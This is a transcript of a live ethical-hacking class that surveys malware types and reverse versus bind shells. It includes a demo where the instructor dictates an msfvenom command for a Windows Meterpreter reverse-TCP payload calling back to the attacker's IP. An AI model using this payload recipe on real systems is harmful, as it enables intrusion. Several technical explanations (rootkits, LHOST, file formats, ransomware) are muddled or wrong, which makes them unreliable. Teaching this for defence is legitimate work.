Hi, can you hear me? Hello. Shushmita, can you able to hear me voice?
Yes, sir, you're audible. You can start the session, sir. Good
Yeah,
evening.
just give me a minute. I'll
Yeah,
just
yeah.
connect the charger. Just give me a minute.
Yeah, yeah, sure.
Yeah, hi everyone. So just let me know if my screen is visible for everyone. Yeah, good evening. I hope my screen is visible for everyone. Yes, okay, thank you. Yeah, so actually today we're going to see about what is malware and what is how the malware is working, and we see a bit deep about malware, and the same way we see how we can bit topics based on the yesterday topic we do some continuations as well. So we see one by one. Okay. So and yesterday I say that also try to create your account in this aws.amazon.com. So if everyone get created, then fine. I will show you how to create this, or else, if not, right, I will give one more day for everybody. So once you all created, right, so then even though I can able to explain you on the next classes, upcoming classes, so I will show you how you can able to create the Linux operating system from the cloud. Okay, but this cloud, using this cloud, you can able to do some basic. I mean, you can do the practice from your end. Okay, like how to handle the Linux file system and installing new softwares and everything you can try. Okay, so and I will show you how you can able to get to different Linux operating system, because here we are seeing only same flavor like Kali. Okay, Kali in the sense you can the same command you can use it on Ubuntu. Same, I mean, what and all the operating system is coming under the Debian. So for all the operating system, we can able to use that same commands. Okay, so even though we need to do some practice on the different flavor of operating system, which is not coming under the same operating systems like Debian like that. Okay, we need to work on different flavors and different OS levels. Fine. So you through the cloud, we don't have the Kali, but we what we can do, we can able to create same like a Kali related operating system. Even you can use the Ubuntu. That is also so much of comfortable, because it's same like Kali. Yeah, in mobile also you can use, but you will not feel that much comfortable. I mean, if you're using the laptop, right, that will be most comfortable. But in mobile, the screen size and running some commands, so if even if you see some errors, right, you can't able to even properly rectify that. Yeah, termux you can use, but anyhow, you need to what to say. Actually, we are not completely going to they rely on the okay. I understand your point. Okay, you are saying that you're going to use the Terminux as a Linux to work as a cloud. I mean, to practice the Linux operating system. Is my understanding is right? Okay, okay. So no, you can't do like that. Using Terminux, you can do, but you can't see complete future of the Linux operating system terminal, because you are using the mobile based, right? Mobile based, you can able to use, but you have some bit of minimum level of features. So after that, you need base. I mean, if you want to use more in the Linux, right? Sure, you need at least cloud, or else you need to install in your virtual box. Only that too will help you on this. Okay, fine. Hmm. Okay, so today we see about malware, and I will show you how to create the Linux in the on the cloud on next class. Okay, so because I don't know how much of them or install the Linux, I mean create the account in the AWS cloud. Userland, I don't know about the userland. If you're using the Linux in the dual boot, that's not a problem. You can use them. That is so much of enough. Okay, so today we're going to see about the malware. Okay, so malware is like we know what is malware. Actually, if we hear that word, we say that okay, we can able to damage the system. We can able to get the access of some system. We say like that. Okay, that is the actual usage of the malware. But malware is the common word. Okay, it's not a specific based of attack. So it's a common word. Okay, under malware we have so much of virus types. Okay, one is like normal virus. Okay, then we have worm virus. Then we have rootkit. Then we have ransomware. Then we have spyware. Then we have there's so much of malwares. Spyware we have. Then we have mm, Trojan. Trojan like to get the backdoor of the system. So then we have keylogger. Okay, if we see this, right, so we have so much of malware, I mean, malwares. Okay, each and every malware is having unique character. We can say it's like a behavior, unique behavior. Okay, so if this malwares come into your system, right, your system will get affected, so you will face so much of shortcut keys will, I mean, shortcut files will created in your system. Then sometimes you see that you see the drive like this. Okay, if you open this, so if you open this, you will see like some of the files are there. Okay, but sometimes you will see empty files, but you will see that okay, around 8 to 4.9 GB files are get I mean I mean that much of storage got used. But if you open that, you will not see any files. That is called a shortcut file. So you'll see the memory size, but you can't able to access the actual file. Okay, even though if you try to open that file, you see only 5 KB of file, 2 KB. Okay, all the files got removed, only the shortcut files, only the minimum KB size file you can be able to see in the folders. Okay, that is the one of the types. Okay, in virus itself, we have so much of types. Okay, each and virus will each and every different types of virus having the different characters. Okay, so that is a virus. The worm virus in the sense it will slow down in your system. Okay, so if you had once this worm virus got installed, right? So if you move your cursor like this, you can see my cursor is moving fast now. Okay. Uh, yeah, that is also a malware, and I will explain difference between vulnerabilities and malware. Okay, once I will explain about the malware, even you will get a bit idea about what is malware. So already I explained what is vulnerability. Okay, so even though if you're not able to understand, no issue. In mid of this classes, I will show you the I mean I will explain the difference between malwares and vulnerabilities. That's not a problem. Okay. Okay, this will slow down your system. Okay, so if that worm got installed, the mouse will not work like react like this. Okay, if you move the cursor like this, so slowly will fill. Okay, so it will take time to move from one point to another point. It will not move just like this. Okay, so then we have a rootkit. Rootkit is a type of virus. Okay, but this will not affect your system, but will this will help you um, to make your system affect. Okay, if some virus got affected, right? So just imagine okay, this is your system. There is a one virus. Okay, there's one virus. This virus is where, I mean like so keep on silent because there is a firewall, there is antivirus. This virus will know that okay, if now if I got activated, so this firewall and antivirus will detect me and they will send me out. Okay, this virus will know that. Okay, so what happened, right? This once there is a rootkit, the rootkit will help to activate this virus and disable this security operating system. Okay, like it will give more power to affect the system. Okay, it will support for the virus. Okay, not for the prevention mechanism. This rootkit will support the malwares. Okay, so you can make the power bit higher. Okay, if the okay, for example, if there is a malware, yeah, type of virus, uh, s- destroying my system files 2, 3 for 1 hour. Okay, 2, 3 for 1 hour. Okay, so if there is a rootkit in my system, what happened, right? So the rootkit will help this virus to destroy 10, 12 files in a hour. Okay, so it will improve the performance of the virus. So that's why actual rootkit, and but we have different types of rootkit. But I'm just giving the overview definition, but we are not deep dive into what is actually the rootkit is. Okay, so I'm just giving the overview of the rootkit, and even we have different types. Okay, kernel level rootkits are there, application level rootkits are there. So each and every rootkits having the different set of what to say. Uh, I mean different set of impact. Okay. Yeah, first we see what is malware, then only I can able to explain how the malware can able to get into your system. Okay, because based upon the malware behavior, then only you can able to found that whether the system is affected by the malwares or not, and how the attackers can able to send the malware to your system. Okay, first we need to understand what are the types of malware, what is the characters of the malware, how the attackers can able to create. So then you can able to know how the attackers will send the malware to you. Then you will come to know that how you can prevent that. Okay. So then we have the ransomware. So ransomware is also a type of malware. But this is also a different types of behavior. Like once this ransomware got affected in your system, right? So what this ransomware will do? This ransomware will encrypt all your system. Okay. So first, this virus will create a shortcut, but you can able to get the original file back. Okay, because virus and all, you have some antivirus system to get your actual file back. Okay, so if there is 100% of damage, you can at least back up your data around 90%, at least minimum 90% of data you can able to back up. Okay, if there is a ransomware, right, so you can't be able to back up 90% of data, because around we have 350 plus different types of ransomware in real world. Okay, so there is so much of ransomware, and few ransomware are not have the proper solutions. Okay, so even we don't have a proper anti prevention system for that. Anti prevention system in the sense. So first I will explain what actually ransomware will do. Then you can understand that, okay, how what is the prevention system for that. Okay, so just see. So ransomware will encrypt your system, and if you try to open some data, right, what it will show? It will show you some pop-up window like, you need to pay me this much of Bitcoin. Example, I'll show you. There is a one of the ransomware name called yeah. So WannaCry ransomware. Okay, so you can read the case study. Okay, but I'll show you the image of the WannaCry ransomware. Okay, so this is the actual image. So if your system got affected with this WannaCry ransomware, right? If you try to open some files, so you will see this window. Okay, so check payment, decrypt. So likewise, you can see that. And here you see some message like send $3,000 worth of Bitcoin. Okay, so not a dollar, sorry. 3,000 worth of Bitcoin. Yeah, so 3,000 worth of Bitcoin to this address. Okay, you need to send 3,000 worth of Bitcoins. Sorry, I say 3,000. So 300. Sorry. 300. Okay, so 300 in the sense it's affected. I mean, this WannaCry was so much of familiar around 6, 7 years back. Because this ransomware got affected so much of organizations, and they try to get, I mean, so to recover their data, I mean, to back up their data, they face so much of challenges, because that time this is the 0 days attack. Okay, so I think everyone know what is 0 day. 0 day in the sense, without updating of the antivirus, even this virus can't able to detect by any antivirus or any firewall system. Okay, that is called 0 days. It's like a newborn. Okay, so this is the actually newborn virus at that time. So much of organization got affected. So the hackers are demanding 300 rupee. I mean 300 worth of bitcoins. Then only you can able to get the actual decryption key. So then only you can able to decrypt, and you can able to get your files back. Until that you can't able to do that. Okay. So the second thing is like, So after this 300 worth of Bitcoin is for 3 days. So if you're not ready to pay for 3 days, right? So the next day it will be 600. Okay, they increase the amount, and that time the amount will be like around 20 lakhs, I think so, 22, 25, I don't know. It's for 35 lakhs. So when this ransomware got affected in so much of organization, right? That time the one Bitcoin amount will be around 35 lakhs something. Okay, that time. So anyhow, so okay, so this is a type of ransomware. So if you want to see what are the types of ransomware, so you can see in there is a site called ransomware decryption key. Same. Yeah. So this is a site you can able to see how many different types of ransomware are there and what is the name of the ransomware, everything you can see here. Actually, this is not a site to maintain types of ransomware. Okay, from here you can able to get the decryption key of this type of ransomware, but not for the all. So you have a key for few ransomware. So if this types of ransomware got affected in your system, then you can able to get this decrypt key and you can decrypt your what to say, your entire system, and you can get the data back. Okay, so if you want to see more detail about this particular ransomware, you can just details use this guide. Okay, you can read more about that ransomware. Yeah, fine. Yeah. So the in ransomware, even we have two types. One is like online ransomware. Okay, one is offline ransomware. Okay, one is online, another one is like offline ransomware. Online ransomware in the sense, so once this is a virus file got executed in your system, right? Whenever you are connecting with the internet, then the virus got spread and then your system got affected. Okay, offline ransomware in the sense, even though if you are not connected with the online, also your system will get affected. But the two things also having the advantages and disadvantages. Advantages for the online, like, so if you're not connected to the internet, it's I mean your system will not damage that much. It's take time to damage. When before in that time you have a I mean you have a breathing time. Okay, before that you can able to at least request some amount of data. Okay, so if it is offline, right, there's no chance. Even if you keep the without internet or with internet, also your system will get affected. Okay, so your entire system will get encrypted. So you need a decrypt key to decrypt the data. But so if it is online, right, it's very hard to decode your what are the files of affected rights. It's very hard to decode. But if it is offline, it's easy to decode. So this is the advantage. Okay, advantage and drawback. So we have both in there, both type of ransomware. But ransomware or still now there are so much of systems that have got affected. Even though recently there is a newer type of ransomware, it's affected so much of organization. Overall, I mean they are not specifically attacking any organization; they are just randomly searching. And if there is a way to insert their ransomware into their system, right, they are inserting that. Okay, so that is one of the ways right now they are doing. So there is a so much of answer ransomware model. So there is another one malware called spyware. Spyware in the sense like, so if you can this tool will this is a tool will work like a spy. Okay, so if you want to what to say, mm, if you want to spy some of the system, right, that time you can able to you just install this. So once you install that, right, so nobody can able to find what actual files are in your installed directories. Even if you go and see in the control panel also, you can't able to see that. Okay, so this spy tool will monitor each and every activity. Even if you are in the Zoom call, right, that activities also get monitored. Even if you are in any other activity, the entire things will get monitored. And what happened finally, so once you got that system, you can able to export it or import all the data and you can get that back to you. Okay, but mostly this will be like a offline type. Okay, so you need to take that system and you need to get the data. Okay, even there is some type of spyware, you can get the data through the online. but most of the time you will have the spyware in the offline model. Okay, then we have the Trojan. Trojan, everybody will know that. So you once you install the somebody install this Trojan, right? You can able to access entire system of that particular target. And even there is a restriction. Okay, you will not, even though if this is a ransom, I mean Trojan file installed in the target system, you will not get the complete access of the system. There is a chance of privileges. Like so, if you, I mean, for example, this is your system. There is a two different types of user. Already yesterday we saw that there are different types of users, like guest user, super user. Then we have the root user. Same way, there will be a different types of user. So just imagine there is a username called G. There is one more user called A. So A considered as the admin. G is a normal user. If this G user installing that application in your in this system, right? Then what happened? You will get the access, but what under the privilege this G will have, only those privileges you can use. You can't able to get the same all the privileges like admin, because that file got executed by this G user. So it means G user privileges only that particular file can able to share with you. Okay, so that is the I mean thing. So you get access, but there is a privilege problem. Okay, so it depends upon that who is going to execute user levels. Based on that, the target, I mean, will get the access. So the second, the final thing is like a keylogger. Keylogger, we have a different types of loggers. One is like hardware, another one is like a software. So hardware you can get it from you can purchase it. So hardware keylogger, you can see. mm, So the hardware keylogger will look like this. Okay, if you see, you can purchase it from Amazon, but we don't have a provision to purchase, but we have a, oh, I mean, hardware, but we don't have proper provision to purchase here. Maybe there is a blocking because of the, I'm opening from India, right? So maybe there is a some ethical issues. They will block us, but no issue. And we are just going to see what how the hardware looks like. So mostly the hardware will look like this. Okay, so see here, this is actually your keyboard or your keyboard wire. So this is the hardware like a keylogger. So they will insert the wire into this and they will connect with the laptop. So when the user is hitting the key, whatever the key, I mean, it will read the keystroke. Keystroke in the sense, in your system there are A, B, C, D, E, even A is a one type of keystroke, B is a keystroke, C is a keystroke. So whatever the keystroke the user is pressing, all the data will pass through this particular hardware to the system, right? So in that time, this hardware will monitor entire data, whatever you are typing. So everything will get monitored by this, and it will stored in the memory. Okay, so you see that there is a 18 MB, 16 MB of flash memory. Okay, so even there is a option to transfer email and live data transfer. So even if you want to I mean, get the data in the email, you can get. So live data transfer is there. But anyhow, so this is a hardware type keylogger. Software type in the sense you need to install it in the target system. Then only you can able to get the keystroke details. Okay, only you can monitor the keystroke, but other than that, you can't able to do anything. Only it will give the keystroke details. If you're typing hi, how are you will get the detail. Okay, there is a user typing hi, how are you? But the keystroke will read like this. Once you take a H, it will take H first. Then if you're typing I write up, it will come like this. Then you are giving space. If you give the space, then there is a space. The how So it will come like this. So each and every keystroke, step by step, it will get monitored. So finally, I mean, if the user is trying to type something, right, in last you will see hi, how or you. So end of the file and end of the notepad, you see that what is the actual thing, like actual full file. So meanwhile, it will read the data like this only. Okay, even there is an option to get the keystroke over the online, and even there is some of the software will store in the offline. But initially there is an offline mode, like so once you install, well, you need that system to read all the keystrokes. Okay, after that there is a different models of hardware like getting the live stream data like this, and there is a one of the way for application level also. You can install and you can get the keystroke details over the email. That application will also having the options to transfer the data over the mail. So that is the behavior of ransomware, right? Mostly the main thing is like it will encrypt your all the system. Uh, you need a key to decrypt. Okay, even some of the ransomware have the options to getting the access of the system, but mostly the major character of the ransomware will be like decrypting, encrypting the system. Oh, I think this hardware. I think you are saying about it's a 24K. Because if you plan for a hardware level of I mean, if you're planning for some device related to the hardware, okay, so hacking related of device bit costlier. So some of the device will not have the permission to get into the India by to, and some of the device having some uh, partial level of privileges. So there are so much of restrictions. But anyhow, let's see that. Okay, so this is a ransomware malware type, but today we just going to see about this Trojan type of malware. Okay, so others and all we can easily able to create because based on the there are so much of tools you can use that, but if you use the tool based to create some virus, right, easily and every antivirus can able to detect because the thing is like so whenever the new virus or new malwares are coming in the real world, so what the antivirus teams are doing, they are creating some anti-prevention system for that particular malwares. So if you are there is any new virus, I mean, if there is any 0 days of based type of virus, then fine. Or else if you are going to use some sort of tools to create the virus, then sure, any antivirus, even the basic, so much of basic antivirus also can able to easily detect that. So if you want to do some malware creation better, you just learn some coding level to create that. But coding will help you in the next level. I mean, if you want to go to the next level of creation, then only you can go with the coding. So you can learn C sharp, some type of language to create the malwares. Okay, and even you there is some type of API keys. So the I mean, if you want to detect why if is this file is a malware file or it's a normal file, so there is a type of API keys you can you if you see some type of API keys there inside the malware, you can detect that. I mean, you can found that there that is a type of malware. I mean, what I try to say that, so you see that this is a virus file. We know we use some commands to create the virus file. Okay. But is this virus will want to get the access of my system, right? To give my system access to the attacker, then there is a some sort of coding like APIs. Okay. So it's a type of APIs. That API in the sense simply if you want to understand more layman words, we can say in program there is a functions. Okay, so the functions or there are some functions are relevant to the malware related of activities. So if that function is got using in this malware file, right, then we can say okay, this is a type of malware file. Okay, that function will help you to do some suspicious activity on the system, right? So using that, we can able to find, okay, this is a malware file. I mean, not only using seeing that function based on the connectivity of that function code, right? We can able to understand that. Anyhow, so if you want to create advanced level, then we need the coding level of knowledge to create those things. Okay. So then you will easily, if you have a knowledge of developing, you can able to easily do the analyzing also. So if there is some malwares or that, you can easily do some analysis and you can create a report and who did the attack and from where the virus file got initiated. So this all the details you can able to get. Okay. Okay, so today, as I said, we are going to see the Trojan files. So Trojan, in the sense, we have a. I mean, it's like if you are executing this malware file in the any of the system, right? Over the network, you can get the access. Okay, so is this a target? Okay, so this is your system. So if you want to get the access of the system, once you install over the internet, you will get the access of the system. Okay, that is the actual usage of this malware. But for that activities, we have a two types. Okay, one is like, I mean, actually we say it as shell. Okay, only we get the shell access. So if this is in the virus file got executed in the system, right, you will get the access, I mean, shell access of the system. Shell in the sense terminal access. Okay, terminal, the command prompt, I mean, in Linux, we say it as terminal. For Windows, we say command access, command prompt access. Okay, so and for this type of shell, right, we need to understanding the two way. One is we have reverse shell, another is bind shell. Okay, so for reverse shell, we need to, I mean, mostly we use the reverse shell model. The reason is like reverse shell will can bypass the firewall. It's not 100% of bypassing, like bit level. I mean, it's a basic level. So the reason we are using it will bypass the firewall. So simply we can keep it in that way. But even if there is a antivirus, there is a firewall, sure that that firewall and antivirus can able to find out this actual files. Okay, but even if you use the reverse shell, okay, you are creating some using some coding and you are using some techniques to bypass it. Even this reverse shell model will help you to bypass the firewalls. Okay, the thing is like the reason how the reversal will help you to bypass. So if you are installing some virus in the system, right? So anyhow, this virus will give the access to the hacker system, hacker PC to the hacker PC. This virus will give the all the details. Okay. So if this virus file got executed, right? So what happened? This virus will give you the data from here. Okay, the starting point will be from here only, not from this system. Okay, this system will not come to your system and will not ask, okay, can you say what is happening in the system? Okay, so this system, this virus file will initiate the request first. This virus file only send the data first. So this is the starting point. Okay, so the starting point. So from this only the data will go. Then only this system will send the response for that request. Okay, so initiation will be from the target. So okay, you can ask anyhow. There is a target, so there is a request is initiation from the target system. Even there is a possibility of finding, right. So how we can able to bypass? The thing is like mostly okay. So in firewall we can consider it as two types. One is like incoming traffic. For this system, there is a traffic called incoming and there is a traffic of outgoing. Okay, if you're requesting something to some from someone, it's like outgoing traffic. First, the day request will start from your side to the target. Okay, if someone is doing request writer, then it's a incoming traffic. Someone is from outside to you are getting the data to the inside. Okay, so mostly we focus on the incoming traffic. The thing is because if just imagine if this is your web application, this is a web server system, right? There is a chances of legal user and illegal user, I mean, uh, hackers and normal user. We can take it like this. Okay, bad character. I mean, hackers and normal users. Even the hackers also try to access the site, and the same normal user also will try to access the site. Okay, there's a chances of two users. Okay, so I just want to focus on. So okay, so I hope everyone can able to hear my voice clearly, right? Okay, flipper zero I will explain later because now I can't able to explain because completely it will take it to the different direction. I will explain at the end of the classes, okay? Because if I say right now, it will take it to the different direction. So I'll explain a bit later. Okay. So you have the incoming traffic. Mostly we'll focus on the incoming because that's a hacker and legal user. So I just want to monitor this incoming traffic. Then only I can able to prevent my target, because the risk rate will be high 100% here. For outgoing traffic, the risk rate will be 10%. Anyhow, there is a risk, but we say it as 10% of risk. Okay, so that's why mostly we'll focus on the incoming traffics. So if the request is going from my side, right? So 90 percentage, there is no, no, there is no risk rate, right? So easily the data will come out from the system. That's why we are focusing on the reverse shell. If it is a bind shell, then what happens? The request will initiate from the hacker system to the target. So sure, the attacker, there is, if there is a firewall, the firewall will detect, okay, someone is requesting some data from my system. So even though that is not a proper IP, everything can easily monitor. Okay, even though if it is a real reverse shell, we can able to monitor. Okay, but I'm saying the difference between bind shell and the reverse shell. Okay, so if you are not having so much of security devices and so proper security mechanism, so then easily the reversal can able to bypass and that data will go to the hacker device. Okay, so if you have the at least minimum level of prevention mechanisms, and your system having proper monitoring systems, everything, at least so you can able to prevent something. Okay. Okay, so mostly we use the reversal. So to create the reversal, we have different set of tools, like we can use MSF Venom. Okay, we can use the MSF Venom. MSF Venom is like a tool. What to say? It's come under the Metasploit framework, C2 framework. Okay, the tool come under the Metasploit framework. Okay, so you're using the MSF Venom, you can able to create some virus file, but this is for for the education purpose we are using this. And even though if we use this MSF Venom to send some, sending virus to some target, right? Whatever it is you are sending to the target, sure it can be detected. Okay, so we are not using the proper bypassing methodology, everything in this, because my Metasploit framework is the oldest model. We have it's in the, we are using this from the longest time. So most of the antivirus can able to easily detect whether it is, if you're creating something from here, this one, so easily they can able to detect. So for the practice purpose we are doing what is actually is malware and how the malwares are getting created. So for the practice purpose we are using this tool, and we have so much of tools. Okay, so for now we are going to use the MS of Venom to create that. Okay, so or else if you have good knowledge on the coding, using coding also, program language also you can able to create. So like using Python, you can use C or C++ or C sharp. So whatever the language you can able to create. Okay, so now we are going to see using the MS of Venom. So in MS of Venom, we are going to create a reversion. Okay, so before creating the malware, okay, we need to know actually a few things. Okay, so we need to know something about the target system. Then only we can able to create a proper malware file. Okay, otherwise what happened, right? So you can create a malware file. You can use it like a phishing attack. So you can post it that malware in some places. So who are all trying executing that malware file, so that all the audience are your targets. Okay, so specifically we can't able to specify someone to do the attacks, because so while creating the malware, we need to mention that whether it is a Windows based, or else it is a Linux based, or else the Android, or else it's a Mac based. So the operating system flavors I need to mention, not operating system I need to mention here. Okay, and the second thing is like I need to mention the architecture. So whether it is 64-bit architecture or 32-bit architecture, but anyhow, nowadays all the architectures or will be the 64-bit architectures only. So no issue. We can directly imagine that the target will have the 64-bit architecture. Okay, but even though there is a chance of 32-bit architecture, so we need to know about the architecture. Okay, so then only we can able to create the malware. Okay, the reason is like the malware command will look like this: msf vnom, sorry, msf vnom hyphen t P in the sense payload. Okay. So payload in the sense once the malware is got executed in the target, right? So then what the malware will do? Malware will do some activity to get the data to the target system. So to take the data from one system to another system, right? That activity can be handled by the payload. Okay. So in the payload, I just want to mention actually, if, for example, I will take the Windows. So Windows. Okay, x64-bit architecture that target may will be. So, and I need to send that, mention that meter Peter / reverse underscore TCP underscore TCP. So, this is the payload. Okay, this is, I mean, I'm not writing the complete payload. Anyhow, I'll show you that. So that time you see the complete payload of this. So I'm just mentioning that the target will be the Windows and the architecture will be the 64-bit architecture. So, and the meter Peter session in the sense, so once you go execute that malware file in the target, right, you will get the access. Okay, you will get the access of the target. So the where you can able to get with the help of the meter Peter. So the reverse shell in the reverse TCP in the sense, once this malware file got executed in the target, so if it is executed, then the data should come to the hacker system. Okay. So this is the complete payload. I mean payload. Okay. Then I just want to mention the L host. Okay. L host in the sense local host. So I just want to mention the localhost IP here. Okay, the reason is like, so if this virus is executed in the target, right? So anyhow, the data will transfer over the network. So for the network, you need the IP and port number you need. Okay, you need an IP and port number. So without this, you can't be able to send the data. Okay. So even not for the specifically creating the malware. So the general way, if you want to send information to somebody over the network, you sure need the IP. Even the communications, whatever we are doing right now, for that also we need the IP address and port number. So without IP and port number, the data will not go to any system. So IP and port number we need. So the thing, and that's why here we are mentioning the L host. So if you mention R host, it's a remote host. Okay. So L host in the sense local host. So we need to specify this. In this, you need to mention the Kali IP. Kali IP in the sense hacker IP. Because once the virus got executed, so in the internet world, there are so much of system. The virus want to know that, okay, specifically to which system I need to transfer the data. So then only you can able to see actual details of the system. Okay. So then we need to mention the Kali IP. So once you mention that, the system know that, okay, so once it got executed, so other malware will know that automatically the data will come to this Kali system. Okay. And you need to mesh with the L port. L host in the sense local host, L port in the sense local port. Okay. Once the data come to the system, right, Kali system, so there are so much of ports. I mean, example, you can consider the port is like a way to get the data in. Okay, so in PC there are so much of ports. Okay, we can consider there are so much of ports. Okay, each and every port will do different types of activity. The reason, if there is only one port, so if you are sending so much of data via the same port, right, there will be a conflict. Okay, sure, there will be some data damage, many things can be happen. Okay, so if you have the different ports, so you can able to access the different ports for different services. One port will work for getting the website, one port will work for the email service. So likewise, each and every port will work for the unique services. Okay, so port will help you on that. Okay, so here I need to mention the specific port. Okay, to through which port I need to get the data. So here I am going to specify 444. Okay, the reason why I'm specifically giving 444, the reason is like we have the total number of port number. Total number we can consider there is a 65,535 port number, but till 1024 we know that so many of, I mean, this all the port numbers are already occupied for some other services. Okay, just imagine there is a person. Okay, there's one person working for some services like sending some okay, from your home to your friend home. This person is taking some data. Okay, so it may be any data like it's taking some normal messages or else some gift, something will be there. Okay, so taking some data to this friend home. Okay, in the same way, there is another one data is also if you are giving to this same port number, right? So this port number will not work. This user will not work for this user. Only for this user, this particular person will work. Okay, the reason is this particular user is already occupied for this particular services. Okay, only whatever the information is given from this user can able to do that. From this user will not do. Okay, because one user, one service, I mean, if there is a web service, the particular port, if it is occupied, then you can't able to use the same port for the different services. Okay, that's why what I'm doing here, instead of giving the same ports to do some conversation, right? What I'm doing, I'm giving something more than 1024, which is all, I mean, not used for any other services. Okay, so even if you can ask me, okay, if I want to find out that, okay, whether the 444 is ideal or not. Okay, there is a different way you need to do to find out what are the ports are ideal and what are the ports are um, running in the target system. Okay, so that will take, I mean, you need to do some different methods to do that. But as of now, we are not going to discuss about that because we need to understand so much of things about the malware. Then only you can able to do that. Okay, whether there is a port 44 is running or not, that you can able to find out. Okay, so then I need to specify the for the file system. What type of file system is my target can able to understand? Like if it is a Windows, right? You need to specify .exe because Windows can understand the .exe file. If it is a Linux, right? You need to specify ELF. Okay, then you need to give the output where the virus file should store. Okay, you need to give the output and you need to mention any name.exe. Okay, then only you can able to execute the create the virus. Okay. Based on the extension you need to create here. Okay, fine. So this all the data will stored in the virus file. So then the hacker will think how in which way the hacker can send the data to you. I mean the virus file to you. The hacker will think and the hacker will play some techniques to send the data to your system. Then hacker once you execute, you will get the access of the system. I mean the hacker will get the access of the system. Fine. Anyhow, I'll show you how to create that. Before that, if you guys have any doubts, you can ask me. So you can't able to hack with the help of IP and MAC. So you need the port. If you are targeting some system, right, you should need some specific port numbers and you need to find some misconfiguration and you need to find whether there is some public level exploit. So you need to analyze so much of things to take the target. Just IP is not a proper thing to get the do the exploit. And MAC address, no, we can't do that. Okay, so just a minute, I'll turn on my virtual box. Yeah. So I will use the terminal to get create the virus file. Okay. So sudo su. So first I will get the root access of the system. Okay. VirtualBox in the sense, VirtualBox is like so you can able to install multiple operating system. Okay, multiple operating system. So for example, if you need Windows and same time you need to use the Linux, you need the both access, both system access. That time what you can do, you can use the VirtualBox. So you can use the Windows as a main operating system. Then inside that you can install the inside the VirtualBox you can install one more operating system like whatever you want, like with Linux. In Linux we have so much of flavors, so you can select any one of the flavors to install. That is a VirtualBox. So even you can specify, you need to specify not a virtual operating system, you need to download some operating system from the internet. So like how you are installing the operating system directly to your system. So that time you will download some ISO files. Same way you need to download some files. So using VirtualBox, you can configure like just a minute, I'll show you that how to do that. Then I think already I show how you guys can able to do. No issue. I'll show you once again. So why you need to install the virtual box from this link, box download. So you see that you from here you can able to download it. Okay. So virtualbox.com, you can download it from here. Okay, once you download and install, it's a normal installation. There is no something tricky way. So it's a normal installations. Once you install, I just open the virtual box. So you see here already I had just installed three different types of Linux, like one is Kali, one is Ubuntu. This is the machines I'm using to show you the demo and all. Okay, so we have three different types of operating system here. But once you install, you will not see anything like this. There will be an empty place. So you need to you can see tools, preferences, import, export, new. So once you click on new, you can able to add the name of the operating system. I'm just using Kali. Okay, you can give any name, not just like that. I mean, there's no dependence like only you can use the same name what operating system you're using. Not like that. You can use any name there. Okay, so I Kali handle. Okay, so I'm just giving some random name here. Okay, then I'll just give the specify what operating system I need. Then I need to specify the hardware. So here you can give some amount of RAM. So based on the your operating system model, you need to specify the RAM size. Then you can able to specify the storage. Here there is storage 20 GB. Okay, so you can give more than 20. It depends upon your operating system. If you are specifying, okay, instead of Linux, if you are specifying Windows, right? See the hard disk size will be bit higher. It's taking more than 80. Okay, so because even the VirtualBox itself know that how much memory you need to install the operating system. Okay, the minimum level of memory. So if you click on Windows 10, you see that 50 GB is enough. So if you click on 8, so 40 GB is enough. Because once the operating system got installed, right, though it will occupy some amount of memory from your disk. So based on that, it will give you the storage. But even based on your usage, also you need to consider how much memory you need. I mean storage you need. So here it's only based upon just installing the operating system to open and you open access the basic things. Okay, if you are going to install so much of files and so much of I mean new application you are going to try, then you need to install based on that. You need to specify the storage. Okay, so once click OK, you can see you see that Kali handle will be here, but I just click on no because already there is so much of files in my system. That's why I'm not adding anything here. So once you add right, then you see the name here. Then just click on settings. In settings, you just go to the storage. In storage, you see the name called empty here. Okay, just click on empty. Just click this disk file, and you can choose your disk file. Okay, choose your disk file in the sense you already download some files from the internet, right? Like for based on your Linux, you download some file from the internet. So you can just go to downloads. You can see that ISO file here. Okay, just click on that ISO file. You can install that. Okay, so then if you click start, automatically after this normal way. So how you're going to install the normal operating system, in the same way you will install that. Okay, but the system will not get restart anything. So just you will get one, you can see one of new window. In that window, everything will happen. Okay. Sorry, I just closed it. Sorry. Okay. Okay. So now I'm going to take this system as my target. Okay. So and I'll open one more system. So this is my one of the system. We created okay, let's see uh, whether the system will help or not. So before doing the practice, right? So we need to create bridge network. Just make sure your both the system, I mean, both the system network should be in the bridge adapter mode. Okay. Okay, then I'll just make sure of my Kali also. Okay. So the thing why I'm looking for the same network, because we are not connected. My system is not connected to the public. I don't have any public IPs to connect in the public. So that's why I'm what I'm doing. I'm using in the same network. If you want to try over the public, you need the public IP. Okay. Okay. So what I'm doing here, I'm using MSF vnom command to create a new virus. But this is a normal educational part. Don't use this for any other things. Just we are seeing how the malwares are getting created and how the malwares will react. So then only we can able to identify how the I mean you can prevent from your system. The reason why we are seeing here in the practical way, once you know how to create right. So then you can think from the hacker point, okay, the hacker will create like this. You send all the data or need to create that virus file. So when you are coming to the prevention system, you know what and all the data will be in that particular file. So over the network also, what and all the data will get travel, everything you can understand. So then easily you can point it, okay, this is a genuine file, this is a malware file. So that's why we are doing the practice. Windows x64 meter Peter dash reverse underscore TCP. Okay, then I'll just mention L host. The L host will be the IP of my system. This is my IP. Copy, pasting here. So if you miss any characters or small caps, sure this will show the error, because Linux already we know that this is a Linux or case sensitive. So properly you need to mention, if it is a caps, you need to mention cap. Small, you need to mention small. So then I'm giving L port equal to 4444. Okay. Then I'm just using some file .elf format. Sorry, I'm just giving ELF. Then I'll just store that file in the name of demo .elf. Okay. So it will take few seconds to create a file. Just wait. And I'm mentioning here Windows. Valid Linux. Just a minute. We can able to get some internet. So MS of Vina reversion. So this file you can get it from the internet also the command can you someone confirm me my voice is audible, right? Because mine it is taking time to load. Okay. Work in the sense that file should work only in your network. Okay. Is it my voice is audible, right? Suddenly got disconnected and connecting again. Hello. Is that my voice is audible?
Yeah, yes, sir. Your voice is audible.
Sorry, I don't know. Suddenly my the Teams got disconnected and connecting again. I
Yeah,
thought
yeah,
of
that's
it's
okay, sir.
